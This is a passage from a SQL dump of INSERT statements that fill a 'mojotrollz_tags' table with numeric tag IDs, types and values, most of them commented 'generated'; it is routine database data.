VALUES (3862, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3862, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3862, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3863, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3863, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3863, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3864, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3864, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3864, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3865, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3866, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3866, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3866, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3868, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3868, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3868, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3872, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3872, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3872, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3873, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3873, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3873, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3875, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3875, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3875, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3877, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3877, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3877, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3882, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3882, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3884, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3885, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3886, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3886, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3886, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3887, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3887, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3887, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3888, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3891, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3891, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3892, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3894, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3897, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3899, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3901, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3903, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3906, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3914, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3914, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3914, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3915, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3916, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3917, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3919, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3920, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3921, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3922, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3923, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3924, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3925, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3926, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3927, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3927, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3927, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3928, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3931, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3931, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3932, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3932, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3933, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3933, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3933, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3934, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3934, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3934, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3934, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3935, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3935, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3936, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3937, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 1, 10, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3940, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3941, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3942, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3943, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3944, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3945, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3947, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3947, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3947, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3948, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3951, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3952, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3953, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3954, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3955, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3958, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3959, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3960, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3961, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3962, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3963, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3964, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3964, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3965, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3967, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3967, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3968, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3969, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3969, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3970, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3970, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3974, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3974, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3974, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3975, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3975, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3975, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3976, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3976, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3976, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3977, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3977, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3977, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3978, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3980, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3981, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3981, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3983, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3983, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3983, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3984, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3985, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3985, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3986, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3986, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3986, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3986, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3987, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3988, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3989, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3991, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3991, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3992, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3992, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3993, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3993, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3994, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3994, 1, 30, 0, 